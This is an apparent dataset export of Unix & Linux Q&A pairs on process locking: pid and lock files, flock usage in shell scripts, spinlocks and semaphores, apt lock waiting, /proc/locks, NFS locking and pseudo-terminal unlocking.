output
stringlengths
9
26.3k
input
stringlengths
26
29.8k
instruction
stringlengths
14
159
pid files are written by some programs to record their process ID while they are starting. This has multiple purposes:It's a signal to other processes and users of the system that that particular program is running, or at least started successfully. It allows one to write a script really easy to check if it's running and issue a plain kill command if one wants to end it. It's a cheap way for a program to see if a previous running instance of it did not exit successfully.Mere presence of a pid file doesn't guarantee that that particular process id is running, of course, so this method isn't 100% foolproof but "good enough" in a lot of instances. Checking if a particular PID exists in the process table isn't totally portable across UNIX-like operating systems unless you want to depend on the ps utility, which may not be desirable to call in all instances (and I believe some UNIX-like operating systems implement ps differently anyway). The idea with lock files is the following: the purpose is for two (well-behaved) separate instances of a program, which may be running concurrently on one system, don't access something else at the same time. The idea is before the program accesses its resource, it checks for presence of a lock file, and if the lock file exists, either error out or wait for it to go away. When it doesn't exist, the program wanting to "acquire" the resource creates the file, and then other instances that might come across later will wait for this process to be done with it. Of course, this assumes the program "acquiring" the lock does in fact release it and doesn't forget to delete the lock file. This works because the filesystem under all UNIX-like operating systems enforces serialization, which means only one change to the filesystem actually happens at any given time. Sort of like locks with databases and such. Operating systems or runtime platforms typically offer synchronization primitives and it's usually a better decision to use those instead. There may be situations such as writing something that's meant to run on a wide variety of operating systems past and future without a reliable library to abstract the calls (such as possibly sh or bash based scripts meant to work in a wide variety of unix flavors) - in that case this scheme may be a good compromise.
I often see that programs specify pid and lock files. And I'm not quite sure what they do. For example, when compiling nginx: --pid-path=/var/run/nginx.pid \ --lock-path=/var/lock/nginx.lock \Can somebody shed some light on this one?
What are pid and lock files for?
lslocks, from the util-linux package, does exactly this. In the MODE column, processes waiting for a lock will be marked with a *.
Using flock, several processes can have a shared lock at the same time, or be waiting to acquire a write lock. How do I get a list of these processes? That is, for a given file X, ideally to find the process id of each process which either holds, or is waiting for, a lock on the file. It would be a very good start though just to get a count of the number of processes waiting for a lock.
How to list processes locking file?
Here's another way to do locking in shell script that can prevent the race condition you describe above, where two jobs may both pass line 3. The noclobber option will work in ksh and bash. Don't use set noclobber because you shouldn't be scripting in csh/tcsh. ;) lockfile=/var/tmp/mylockif ( set -o noclobber; echo "$$" > "$lockfile") 2> /dev/null; then trap 'rm -f "$lockfile"; exit $?' INT TERM EXIT # do stuff here # clean up after yourself, and release your trap rm -f "$lockfile" trap - INT TERM EXIT else echo "Lock Exists: $lockfile owned by $(cat $lockfile)" fiYMMV with locking on NFS (you know, when NFS servers are not reachable), but in general it's much more robust than it used to be. (10 years ago) If you have cron jobs that do the same thing at the same time, from multiple servers, but you only need 1 instance to actually run, the something like this might work for you. I have no experience with lockrun, but having a pre-set lock environment prior to the script actually running might help. Or it might not. You're just setting the test for the lockfile outside your script in a wrapper, and theoretically, couldn't you just hit the same race condition if two jobs were called by lockrun at exactly the same time, just as with the 'inside-the-script' solution? File locking is pretty much honor system behavior anyways, and any scripts that don't check for the lockfile's existence prior to running will do whatever they're going to do. Just by putting in the lockfile test, and proper behavior, you'll be solving 99% of potential problems, if not 100%. If you run into lockfile race conditions a lot, it may be an indicator of a larger problem, like not having your jobs timed right, or perhaps if interval is not as important as the job completing, maybe your job is better suited to be daemonized.EDIT BELOW - 2016-05-06 (if you're using KSH88)Base on @Clint Pachl's comment below, if you use ksh88, use mkdir instead of noclobber. This mostly mitigates a potential race condition, but doesn't entirely limit it (though the risk is miniscule). For more information read the link that Clint posted below. lockdir=/var/tmp/mylock pidfile=/var/tmp/mylock/pidif ( mkdir ${lockdir} ) 2> /dev/null; then echo $$ > $pidfile trap 'rm -rf "$lockdir"; exit $?' INT TERM EXIT # do stuff here # clean up after yourself, and release your trap rm -rf "$lockdir" trap - INT TERM EXIT else echo "Lock Exists: $lockdir owned by $(cat $pidfile)" fiAnd, as an added advantage, if you need to create tmpfiles in your script, you can use the lockdir directory for them, knowing they will be cleaned up when the script exits. For more modern bash, the noclobber method at the top should be suitable.
Sometimes you have to make sure that only one instance of a shell script is running at the same time. For example a cron job which is executed via crond that does not provide locking on its own (e.g. the default Solaris crond). A common pattern to implement locking is code like this: #!/bin/sh LOCK=/var/tmp/mylock if [ -f $LOCK ]; then # 'test' -> race begin echo Job is already running\! exit 6 fi touch $LOCK # 'set' -> race end # do some work rm $LOCKOf course, such code has a race condition. There is a time window where the execution of two instances can both advance after line 3 before one is able to touch the $LOCK file. For a cron job this is usually not a problem because you have an interval of minutes between two invocations. But things can go wrong - for example when the lockfile is on a NFS server - that hangs. In that case several cron jobs can block on line 3 and queue up. If the NFS server is active again then you have thundering herd of parallel running jobs. Searching on the web I found the tool lockrun which seems like a good solution to that problem. With it you run a script that needs locking like this: $ lockrun --lockfile=/var/tmp/mylock myscript.shYou can put this in a wrapper or use it from your crontab. It uses lockf() (POSIX) if available and falls back to flock() (BSD). And lockf() support over NFS should be relatively widespread. Are there alternatives to lockrun? What about other cron daemons? Are there common crond's that support locking in a sane way? A quick look into the man page of Vixie Crond (default on Debian/Ubuntu systems) does not show anything about locking. Would it be a good idea to include a tool like lockrun into coreutils? In my opinion it implements a theme very similar to timeout, nice and friends.
Correct locking in shell scripts?
Almost like nsg's answer: use a lock directory. Directory creation is atomic under linux and unix and *BSD and a lot of other OSes. if mkdir -- "$LOCKDIR" then # Do important, exclusive stuff if rmdir -- "$LOCKDIR" then echo "Victory is mine" else echo "Could not remove lock dir" >&2 fi else # Handle error condition ... fiYou can put the PID of the locking sh into a file in the lock directory for debugging purposes, but don't fall into the trap of thinking you can check that PID to see if the locking process still executes. Lots of race conditions lie down that path.
A solution that does not require additional tools would be prefered.
How to make sure only one instance of a bash script runs?
A spin lock is a way to protect a shared resource from being modified by two or more processes simultaneously. The first process that tries to modify the resource "acquires" the lock and continues on its way, doing what it needed to with the resource. Any other processes that subsequently try to acquire the lock get stopped; they are said to "spin in place" waiting on the lock to be released by the first process, thus the name spin lock. The Linux kernel uses spin locks for many things, such as when sending data to a particular peripheral. Most hardware peripherals aren't designed to handle multiple simultaneous state updates. If two different modifications have to happen, one has to strictly follow the other, they can't overlap. A spin lock provides the necessary protection, ensuring that the modifications happen one at a time. Spin locks are a problem because spinning blocks that thread's CPU core from doing any other work. While the Linux kernel does provide multitasking services to user space programs running under it, that general-purpose multitasking facility doesn't extend to kernel code. This situation is changing, and has been for most of Linux's existence. Up through Linux 2.0, the kernel was almost purely a single-tasking program: whenever the CPU was running kernel code, only one CPU core was used, because there was a single spin lock protecting all shared resources, called the Big Kernel Lock (BKL). Beginning with Linux 2.2, the BKL is slowly being broken up into many independent locks that each protect a more focused class of resource. Today, with kernel 2.6, the BKL still exists, but it's only used by really old code that can't be readily moved to some more granular lock. It is now quite possible for a multicore box to have every CPU running useful kernel code. There's a limit to the utility of breaking up the BKL because the Linux kernel lacks general multitasking. If a CPU core gets blocked spinning on a kernel spin lock, it can't be retasked, to go do something else until the lock is released. It just sits and spins until the lock is released. Spin locks can effectively turn a monster 16-core box into a single-core box, if the workload is such that every core is always waiting for a single spin lock. This is the main limit to the scalability of the Linux kernel: doubling CPU cores from 2 to 4 probably will nearly double the speed of a Linux box, but doubling it from 16 to 32 probably won't, with most workloads.
I would like to know about Linux spinlocks in detail; could someone explain them to me?
What is a spinlock in Linux?
Since you're using >>, which means append, each line of output from each instance will be appended in the order it occurred. If your script output prints 1\n through 5\n with a one second delay between each and instance two is started 2.5 seconds later you'll get this: 1 2 1 3 2 4 3 5 4 5So to answer your question: No.
If I have a command $ ./script >> file.logthat gets called twice, with the second call occurring before the first one ends, what happens? Does the first call get an exclusive lock on the output file? If so, does the second script fail when attempting to write, or does the shell accept the output (allowing the script to end) and throw an error? Or does the log file get written to twice?
Does redirecting output to a file apply a lock on the file?
I found these methods on Ubuntu Forums in a thread titled: Thread: How do I lock the screen in XFCE?. excerpted from 2 of the answers in that thread Method #1 - Keyboard shortcutOpen the settings manager > keyboard > shortcuts and you can see that the default shortcut to lock the screen is ctrl-alt-del. If you want to change it, click add on the left, type in a name for your list of shortcuts, (widen the window so you can see the whole thing) select xflock4 shortcut on the right and enter the new key combo.Method #2 - via command line $ xflock4Method #3 - xscreenlock Most of the time I use xscreenlock on a multitude of Linux distros. It's fairly ubiquitous. excerpt from developers websiteXScreenSaver is the standard screen saver collection shipped on most Linux and Unix systems running the X11 Window System. I released the first version in 1992. I ported it to MacOS X in 2006, and to iOS in 2012. On X11 systems, XScreenSaver is two things: it is both a large collection of screen savers; and it is also the framework for blanking and locking the screen. On MacOS systems, these screen savers work with the usual MacOS screen saving framework (X11 is not required). On iOS devices, it is an application that lets you run each of the demo modes manually.screenshot of main dialog. There is a ton of screenshots of the various screensavers and Xscreensaver also provides screen locking as well.http://www.jwz.org/xscreensaver/screenshots/
I am looking a simple way to lock my session in Xfce (Debian Unstable). I don't want to have to write my password at every wake-up but I want to be able to press to a shortcut (which launches a commandline) which asks for identification. The usage is to lock my laptop when I leave office for lunch. I want to press this shortcut before closing the screen (and so putting the laptop to suspend). If someone tries to wake it up, he will have to enter the password.
How to lock my session in Xfce?
For most use cases of flock, it's very important that the lock file not be "cleaned up". Otherwise, imagine this scenario:process A opens the lock file, finds it does not exists, so it creates it. process A acquires the lock process B opens the lock (finds it already exists) process B tries to acquire the lock but has to wait process A releases the lock process B acquires the lock instantly process A deletes the lock file process C opens the lock file, finds it does not exists, so it creates a new one. Note that it is now holding open a different lock file that the one that process B has locked. process C tries to acquire the lock and succeeds... but it should have had to wait, because process B still has [a prior incarnation of] the lock file open and locked.
After process is completed, I see that the lock file isn't deleted? Is there any reason that why flock keeps the file ? Also how does flock knows if there is a lock acquired ? Here is the example from a crontab file * * * * * flock python <script_name>.py
Why flock doesn't clean the lock file? [closed]
apt 1.9.11 This was solved in Debian bug #754103 in this commit. The fix is in versions of apt newer than 1.9.11.apt(8): Wait for lock (Closes: #754103)You can enable this option by setting -o DPkg::Lock::Timeout=60 as an argument to apt or apt-get. Where 60 is the time to wait in seconds for the lock. apt -o DPkg::Lock::Timeout=60 install FOO apt-get -o DPkg::Lock::Timeout=60 install FOOYou can test this by running two identical commands and simply not answering immediately on the first one to Do you want to continue? [Y/n]? On the second command you run, it'll tell you,Waiting for cache lock: Could not get lock /var/lib/dpkg/lock-frontend. It is held by process 946299 (apt)
If you are running apt-get commands on terminal and want to install stuff on the software center, the center says it waits until apt-get finishes. I wanted to know if it is possible to do the same but on the terminal, i.e., make apt-get on the terminal wait until the lock is released. I found this link, that uses aptdcon to install stuff. I would like to know if:Is it really not possible to do with apt-get? Is aptdcon compatible with apt-get, i.e., can I use both to install stuff without borking the system?
apt-get wait for lock release
Both manage a limited resource. I'll first describe difference between binary semaphore (mutex) and spin lock. Spin locks perform a busy wait - i.e. it keeps running loop: while (try_acquire_resource ()); ... release();It performs very lightweight locking/unlocking but if the locking thread will be preempted by other which will try to access the same resouce the second one will simply try to acquitre resource untill it run out of it CPU quanta. On the other hand mutex behave more like: if (!try_lock()) { add_to_waiting_queue (); wait(); } ... process *p = get_next_process_from_waiting_queue (); p->wakeUp (); Hence if the thread will try to acquire blocked resource it will be suspended till it will be avaible for it. Locking/unlocking is much more heavy but the waiting is 'free' and 'fair'. Semaphore is a lock that is allowed to be used multiple (known from initialization) number of times - for example 3 threads are allowed to simultainusly hold the resource but no more. It is used for example in producer/consumer problem or in general in queues: P(resources_sem) resource = resources.pop() ... resources.push(resources) V(resources_sem)
What are the basic differences between spin locks and semaphores in action?
what is the difference between spin locks and semaphores?
Invoke a shell explicitly. flock -x -w 5 ~/counter.txt sh -c 'COUNTER=$(cat counter.txt); echo $((COUNTER + 1)) > ~/counter.txt'Note that any variable that you change is local to that shell instance. For example, the COUNTER variable will not be updated in the calling script: you'll have to read it back from the file (but it may have changed in the meantime), or as the output of the command: new_counter=$(flock -x -w 5 ~/counter.txt sh -c 'COUNTER=$(cat counter.txt); echo $((COUNTER + 1)) | tee ~/counter.txt')
flock -x -w 5 ~/counter.txt 'COUNTER=$(cat ~/counter.txt); echo $((COUNTER + 1)) > ~/counter.txt'How would I pass multiple commands to flock as in the example above? As far as I understand, flock takes different flags (-x for exclusive, -w for timeout), then the file to lock, and then the command to run. I'm not sure how I would pass two commands into this function (set variable with locked file's contents, and then increment this file). My goal here is to create a somewhat atomic increment for a file by locking it each time a script tries to access the counter.txt file.
Pass multiple commands to flock
Yes, locks are preserved across exec. Locks are preserved across the underlying system call execve, as long as the file descriptor remains open. File descriptors remain open across execve unless they have been configured to be closed on exec, and file descriptors created by shell redirection are not marked as close-on-exec.
The "standard" locking snippet I've seen goes something like... ( flock -n 200 || exit 1; # do stuff ) 200>program.lockIs it safe (testing seems to say so) to use exec at that point? Will the subprocess retain the lock? ( flock -n 200 || exit 1; exec /usr/bin/python vendors-notcoolstuff.py ) 200>program.lockI vaguely remember exec'd processes retain open file descriptors and since flock uses file descriptors it should work. But I cannot find any documentation that makes that definitive and clear. For the record, this is specific to Linux.
Is flock & exec safe in bash?
/dev/shm : It is nothing but implementation of traditional shared memory concept. It is an efficient means of passing data between programs. One program will create a memory portion, which other processes (if permitted) can access. This will result into speeding up things. /run/lock (formerly /var/lock) contains lock files, i.e. files indicating that a shared device or other system resource is in use and containing the identity of the process (PID) using it; this allows other processes to properly coordinate access to the shared device. /tmp : is the location for temporary files as defined in the Filesystem Hierarchy Standard, which is followed by almost all Unix and Linux distributions. Since RAM is significantly faster than disk storage, you can use /dev/shm instead of /tmp for the performance boost, if your process is I/O intensive and extensively uses temporary files. /run/user/$uid: is created by pam_systemd and used for storing files used by running processes for that user.Coming to your question, you can definitely use /run/lock directory to store your lock file.
I want to synchronize processes based on lock files (/ socket files). These files should only be removable by their creator user. There are plenty of choices: /dev/shm /var/lock /run/lock /run/user/<UID> /tmp What's the best location for this purpose? And what way are above locations meant to be used for?
Linux file hierarchy - what's the best location to store lockfiles?
Bash's processing of the command below may be surprising: flock -x -w 5 /dev/shm/counter.txt echo "4" > /dev/shm/counter.txt && sleep 5Bash first runs flock -x -w 5 /dev/shm/counter.txt echo "4" > /dev/shm/counter.txt and, if that completes successfully (releasing the lock), then it runs sleep 5. Thus, the lock is not held for the 5 seconds that one may expect. Aside on & versus && If one has two commands, A and B, then:A & B starts A in the background and then starts B without waiting for A to finish. A && B starts A, waits for it to complete, and then, if it completes successfully (exit code 0), starts B. If A fails (nonzero exit code), then B is never run.In sum, & and && are two completely different list operators.
I want to have a file that is used as a counter. User A will write and increment this number, while User B requests to read the file. Is it possible that User A can lock this file so no one can read or write to it until User A's write is finished? I've looked into flock but can't seem to get it to work as I expect it. flock -x -w 5 /dev/shm/counter.txt echo "4" > /dev/shm/counter.txt && sleep 5If there's a more appropriate way to get this atomic-like incrementing file that'd be great to hear too! My goal is: LOCK counter.txt; write to counter.txt;while at the same time Read counter.txt; realize it's locked so wait until that lock is finished.
Obtain exclusive read/write lock on a file for atomic updates
This is easy to solve. Issue: Your microphone is not getting enough power. The Raspberry Pi USB ports have issues supplying enough amps to USB devices that need more than power than USB memory cards. Solution: Get an active USB hub (powered hub plugged into a power source like an outlet.) The hub will power the microphone.
On my RasPi board, Debian Linux, the USB microphone occasionally gets locked up such that nothing can use it. The microphone has a LED which is usually flashing, when it's locked, it turns off. The utility arecord describes it as follows: card 1: Device [DYNEX USB MIC Device], device 0:USB Audio [USB Audio] Subdevices: 1/1 Subdevice #0: subdevice #0When the microphone stops working, arecord gives diagnostics like this: > arecord -D plughw:1,0 > recording.wav Recording WAVE 'stdin' : Unsigned 8 bit, Rate 8000 Hz, Mono arecord: set_params:1145: Unable to install hw_params: ACCESS: RW_INTERLEAVED FORMAT: U8 etc...Unplugging and plugging the microphone fixes it, only because the current dip forces the RasPi to reboot! Not an ideal situation. Is there a way to fix this from the command line or a C executable? I also tried using ioctl(fd, USBDEVFS_RESET, 0) using the output from lsusb to provide the bus and device number. That turns the LED back on, but it's overkill. The device has to be re-setup using alsamixer.
RasPi - USB microphone locks up
sudo find -L /proc/458/fd -maxdepth 1 -inum 133880 -print -exec readlink {} \;To get all of them: while IFS=': ' read x x x x p x x i x; do sudo find -L "/proc/$p/fd" -maxdepth 1 -inum "$i" -exec readlink {} \; -quit done < /proc/locksSometimes, the process whose pid is referenced in /proc/lock will have died. You can change the "/proc/$p/fd" above to /proc/*/fd to look for them among all processes fds. (note that it is an approximation as we're only checking the inode number, not the device number, but chances that we pick the wrong file (same inum on a different fs) are very slim).
$ cat /proc/locks 1: POSIX ADVISORY WRITE 458 03:07:133880 0 EOF 2: FLOCK ADVISORY WRITE 404 03:07:133879 0 EOFThe fields are: ordinal number(1), type(2), mode(3), type(4), pid(5), maj:min:inode(6) start(7) end(8). Question: how to find the corresponding file is being locked?
file corresponds to /proc/locks
Linux normally doesn't do any locking (contrary to windows). This has many advantages, but if you must lock a file, you have several options. I suggestflock: apply or remove an advisory lock on an open file. This utility manages flock(2) locks from within shell scripts or from the command line.For a single command (or entire script), you can use flock --exclusive /var/lock/mylockfile -c commandIf you want to execute more commands in your script under the lock, use #!/bin/bash .... ( flock --nonblock 200 || exit 1 # ... commands executed under lock ... ) 200>/var/lock/mylockfile All operations following the flock call inside the sub-shell (...) are executed only if the no other process currently holds a flock on /var/lock/mylockfile. The lock is automatically dropped after the sub-shell exited. flock can also wait until the file lock has been dropped (that's the default). In this case do not use the --nonblock option, which makes flock fail if no successful lock can be obtained.
I have a shell script which will be executed by multiple instances and if an instance accessing a file and doing some operation how can I make sure other instances are not accessing the same file and corrupting the data ? My question is not about controlling the parallel execution but dealing with file lock or flagging mechanism. Request some suggestion to proceed.
How to make sure only one instance accessing the file at a time in a folder?
From man lsof: FD is the File Descriptor number of the file or: FD is followed by one of these characters, describing the mode under which the file is open: The mode character is followed by one of these lock characters, describing the type of lock applied to the file: R for a read lock on the entire file; W for a write lock on the entire file; space if there is no lock.So R in 3uR mean that read/shared lock is issued by 613 PID. #lsof /tmp/file COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME perl 613 turkish 3uR REG 8,2 0 1306357 /tmp/fileReading directly from /proc/locks is faster than lsof, perl -F'[:\s]+' -wlanE' BEGIN { $inode = (stat(pop))[1]; @ARGV = "/proc/locks" } say "pid:$F[4] [$_]" if $F[7] == $inode ' /tmp/file
I would like to get a list of pid's which hold shared lock on /tmp/file. Is this possible using simple command line tools?
Monitoring file locks, locked using flock
The link() system call on the NFS client should map directly to the NFS LINK operation, which the server should implement using its link() system call. So as long as link() is atomic on the server, it will also be atomic on the clients.
I have a cluster with a bunch of servers with a shared disk containing a GFS global file system that all nodes access simultaneously. Each node in the cluster run the same program (a shell script is the main core). The system processes files that appear in a couple of input directories, and it works like this:the program loops through the input directories. for each file found, check existence of a "lock file", if lock file exists skip to next file. if no lock file found, create lock file. If lockfile creation failed (race lost), skip to next file if "we" own the lock, process the file and move it out of the way when it is finished.This all works very well, but I wonder if there are cheaper (less complex) solutions that would also work. I'm thinking NFS or SMB perhaps. There are two reasons for my use of GFS:each file is stored in one place only (on redundant underlying hardware of course) file locking works reliablyI create the lockfile like this: date '+%s:'${unid} > ${currlock}.${unid} ln ${currlock}.${unid} ${currlock} lockrc=$? rm -f ${currlock}.${unid}where $unid is a unique session identifier and $currlock is /gfs/tmp/lock.${file_to_process} The beauty of ln is that it is atomic, so it fails for all but one that attempts the same thing at the same time. So, I guess what I'm asking is: will NFS fill my needs? Does ln work reliably in the same way on NFS as on GFS?
Is `ln` atomic and reliable on NFS? Could NFS replace GFS in this use case?
A tool such as flock can help manage locks. (It may not work with NFS, depending on whether you believe the documentation or the practice, and similarly may or may not work on SMB or indeed any other remote filesystem.) The documentation, man flock, does have several examples of use. Here's one of them tailored to your scenario. #!/bin/bash # Example of using flock(1) to provide a named exclusive lock# Parse command line options while getopts 'd:' OPT do case "$OPT" in d) lockParam="$OPTARG" ;; *) echo "Usage: ${0##*/} -d <parameter>" >&2; exit 1 esac done shift $(($OPTIND -1))# Sanitise lock parameter value (do not trust the user) lockName="$(printf "%s\n" "${lockParam^^}" | tr -cd '[:alnum:]\n')" lockFile="/tmp/lock.${##*/}.${lockName:-noname}"echo "Attempting lock with parameter '$lockParam' sanitised to '$lockName'" >&2 ( # Get the lock or report failure. See "man flock" for other options flock -n 9 || exit 9 # This section is managed by the exclusive lock. Your program code # would go here. echo "Achieved exclusive lock on '$lockFile'" >&2 sleep=10 echo "Waiting for $sleep second(s) to simulate activity" >&2 sleep $sleep # Exit status 0=ok, otherwise 1-8 is your choice of error codes echo "Releasing lock" >&2 exit 0 # End of exclusive lock section ) 9>"$lockFile" ss=$?# Report on exit status from actual code if [ $ss -eq 9 ] then echo "Failed to acquire lock" >&2 fi# Exit with meaning exit $ssMake the script executable (if you call it lockeg then chmod a+x lockeg), and run it ./lockeg -d JOHN_DOE
I'm trying to find a way to lock a script based on a parameter given, but was unsuccessful in finding a proper answer. What I'm trying to achieve is prevent another user from running a script based on some parameter: so if user A executes the script with parameter JOHN_DOE (e.g: -d JOHN_DOE) and user B executes it with parameter -d ANNA_DOE then it runs without any problems, but if user B tries to execute it with JOHN_DOE as parameter while the first instance of the script hasn't finished running then it does not allow the user B to run it. Is there a proper way to achieve this?
Lock a bash script based on parameter?
flock doesn't work over NFS. (It never has, even on UNIX systems.) See flock vs lockf on Linux for one comparison of lockf and flock. Here is a possible solution Correct locking in shell scripts?
I'm planning on having a complicated file sharing setup, and want to make sure I don't destroy file locking. (Wanting to use bind mounting, nfs, nfs over rdma (InfiniBand file sharing), and virtfs (kvm virtual machine pass-through file sharing) on the same data.) I'm at the beginning sanity checks, just testing the nfs server with a single nfs client. Up to date Arch on both systems, nfs-utils 1.3.2-6, kernel 4.1.6-1. I'm seeing unexpected results. On the nfs server: server exports with: /test 192.168.0.0/16(rw,sync,no_subtree_check, no_root_squash) client mount shows: 192.168.1.2:/test on /test type nfs4 (rw,noatime,vers=4.2, rsize=524288,wsize=524288,namlen=255,hard,proto=tcp,port=0,timeo=600, retrans=2,sec=sys,clientaddr=192.168.1.3,local_lock=none,addr=192.168.1.2)In /test, I have a script named lockFile with contents: #!/bin/bash filename="lockedFile" exec 200>$filename flock -n 200 || exit 1 pid=$$ while true; do echo $pid 1>&200 doneIf I use two terminals on the nfs server: 1: ./lockFile 2: ./lockFileThen, terminal 1 quickly fills up a file with its pid, and terminal 2 immediately exits. All as expected. But, if I run a terminal each on the nfs server and client: server: ./lockFile client: ./lockFileThey both happily run, very unexpected. In this configuration, my nfs server is running as sync, meaning the server only says data is written when it is actually written. My nfs client is running as async, meaning the client only transmits the writes when the file is closed. I could see the client running async perhaps not obtaining a lock until it actually transmits the writes, so I tested this, changing the client to sync. client mount now shows: 192.168.1.2:/test on /test type nfs4 (rw,noatime,sync, vers=4.2,rsize=524288,wsize=524288,namlen=255,hard,proto=tcp,port=0,timeo=600, retrans=2,sec=sys,clientaddr=192.168.1.3,local_lock=none,addr=192.168.1.2)Still lockFile happily runs on both machines. Am I misunderstanding how NFS file locking is expected to work? Is it expected to handle server access vs client access? Or, is it just for client access vs different client access?
NFS file locking not working, am I misunderstanding?
As far as I know, no. You have to close it manually: if flock 9 -nx then program 9>&- #<= manual close of fd 9 after `program` has forked but before it execs else echo "Lock held :/)" >&2 fi 9> /tmp/lkIf you want to get extra hacky, you can set the flag by calling the fcntl function directly via ctypes.sh: #!/bin/bashecho initial ls /proc/$$/fd/echo with 9 {ls /proc/$$/fd/echo with 9 in an execced child bash -c ' ls /proc/$$/fd/'} 9</etc/passwdecho echo BEGIN MAGIC FD_CLOEXEC=1 FD_SETFD=2. ctypes.sh echo initial ls /proc/$$/fd/echo with 9 {dlcall fcntl int:9 int:$FD_SETFD int:$FD_CLOEXECls /proc/$$/fd/echo with 9 in an execced child bash -c ' ls /proc/$$/fd/'} 9</etc/passwdOutput: initial 0 1 2 255 with 9 0 1 2 255 9 with 9 in an execced child 0 1 2 3 9BEGIN MAGIC initial 0 1 2 255 with 9 0 1 2 255 9 with 9 in an execced child 0 1 2 3(Not a typo in pasting -- the 9 really did get closed when the child bash got execced).
Can Bash execute a subprocess while preventing a subprocess from inheriting a file descriptor? if flock -nx 9 then # If begin program runs away, it will keep the lock. begin program else echo "Lock held :/)" >&2 fi 9> /tmp/lk
Bash, fork with CLOEXEC
After a small Usenet discussion I use the following as a workaround for flock -n lockfile -c command: #! /bin/bashif [ $# != 4 -o "$1" = '-h' ] ; then echo "Usage: flock -n lockfile -c command" >&2 exit 1 filockfile=$2 command=$4set -o noclobber if 2>/dev/null : > "$lockfile" ; then trap 'rm -f "$lockfile"' EXIT $BASH -c "$command" else exit 1 fi
On Linux I use flock lock command to execute a command with an exclusive lock. What is the standard operating system command of Solaris 10 to do the same in a shell?
How to lock on Solaris 10?
The old AT&T System 5 mechanism for pseudo-terminal slave devices was that they were ordinary persistent character device nodes under /dev. There was a multiplexor master device at /dev/ptmx. The old 4.3BSD mechanism for pseudo-terminal devices had parallel pairs of ordinary persistent master and slave device nodes under /dev. In both cases, this meant that the slave device files retained their last ownership and permissions after last file descriptor closure. Hence the evolution of the grantpt() function to fix up the ownership and permissions of the slave device file after a (re-used) pseudo-terminal had been (re-)allocated. This in turn meant that there was a window when a program was setting up a re-used pseudo-terminal between the open() and the grantpt() where whoever had owned the slave device beforehand could sneak in and open it as well, potentially gaining access to someone else's terminal. Hence the idea of pseudo-terminal slave character devices starting in a locked state where they could not be opened and being unlocked by unlockpt() after the grantpt() had been successfully performed. Over the years, it turned out that this was unnecessary. Nowadays, the slave device files are not persistent, because the kernel makes and destroys things in /dev itself. The act of opening the master device either resets the slave device permissions and ownership, or outright creates the slave device file afresh (in the latter case with the slave device file disappearing again when all open file descriptors are closed), in either case atomically in the same system call. On OpenBSD, this is part of the PTMGET I/O control's functionality on the /dev/ptm device. /dev is still a disc volume, and the kernel internally issues the relevant calls to create new device nodes there and reset their ownerships and permissions. On FreeBSD, this is done by the posix_openpt() system call. /dev is not a disc volume at all. It is a devfs filesystem. It contains no "multiplexor" device nor master device files, because posix_openpt() is an outright system call, not an wrapped ioctl() on an open file descriptor. Slave devices appear in the devfs filesystem under its pts/ directory.The kernel thus ensures that they have the right permissions and ownership ab initio, and there is no window of opportunity where they have stale ones. Thus the grantpt() and unlockpt() library functions are essentially no-ops, whose sole remaining functionality is to check their passed file descriptor and set EINVAL if it isn't the master side of a pseudo-terminal, because programs might be doing daft things like passing non-pseudo-terminal file descriptors to these functions and expecting them to return errors. For a while on Linux, pseudo-terminal slave devices were persistent device nodes. The GNU C library's grantpt() wasn't a system call. Rather, it forked and executed a set-UID helper program named pt_chown, much to the dismay of the no set-UID executables crowd. (grantpt() has to allow an unprivileged user to change the ownership and permissions of a special device file that it does not necessarily own, remember.) So there was still the window of opportunity, and Linux still had to maintain a lock for unlockpt(). Its "new" devpts filesystem (where "new" means introduced quite a few years ago, now) almost permits the same way of doing things as on FreeBSD with devfs, however. There are some differences.There is still a "multiplexor" device. In the older "new" devpts system, this was a ptmx device in a different devtmpfs filesystem, with the devpts filesystem containing only the automatically created/destroyed slave device files. Conventionally the setup was /dev/ptmx and an accompanying devpts mount at /dev/pts. But Linux people wanted to have multiple wholly independent instances of the devpts filesystem, for containers and the like, and it turned out to be quite hard synchronizing the (correct) two filesystems when there were many devtmpfs and devpts filesystems. So in the newer "new" devpts system all of the devices, multiplexor and slave, are in the one filesystem. For backwards compatibility, the default was for the new ptmx node to be inaccessible unless one set a new ptmxmode mount option. In the even newer still "new" devpts the ptmx device file in the devpts filesystem is now the primary multiplexor, and the ptmx in the devtmpfs is either a shim provided by the kernel that tries to mimic a symbolic link, a bind mount, or a plain old actual symbolic link to pts/ptmx.The kernel does not always set up the ownership and permissions as grantpt() should. Setting the wrong mount options, either a gid other than the tty GID or a mode other than 0620, triggers fallback behaviour in the GNU C library. In order to reduce grantpt() to a no-operation in the GNU C library as desired, the kernel must not assign the group of the opening process (i.e. there must be an explicit gid setting), the group assigned must be the tty group, and the mode of newly created slave devices must be exactly 0620.Not switching on /dev/pts/ptmx by default and the GNU C library not wholly reducing grantpt() to a no-op are both because the kernel and the C library are not maintained in lockstep. Each had to operate with older versions of the other. Linux still had to provide an older /dev/ptmx. The GNU C library still has to fall back to running pt_chown if there's not a new devpts filesystem with the correct mount options in place. The window of opportunity thus still exists for unlockpt() to guard against on Linux, if the devpts mount options are wrong and the GNU C library consequently has to fall back to actually doing something in grantpt(). Further readinghttps://unix.stackexchange.com/a/470853/5132 What would be the best way to work around this glibc problem? https://unix.stackexchange.com/a/214685/5132 Documentation/filesystems/devpts.txt. Linux kernel. Daniel Berrange (2009-05-20). /dev/pts must use the 'newinstance' mount flag to avoid security problem with containers. RedHat bug #501718. Jonathan de Boyne Pollard (2018). open-controlling-tty. nosh Guide. Softwares. Jonathan de Boyne Pollard (2018). vc-get-tty. nosh Guide. Softwares. Jonathan de Boyne Pollard (2018). pty-get-tty. nosh Guide. Softwares.
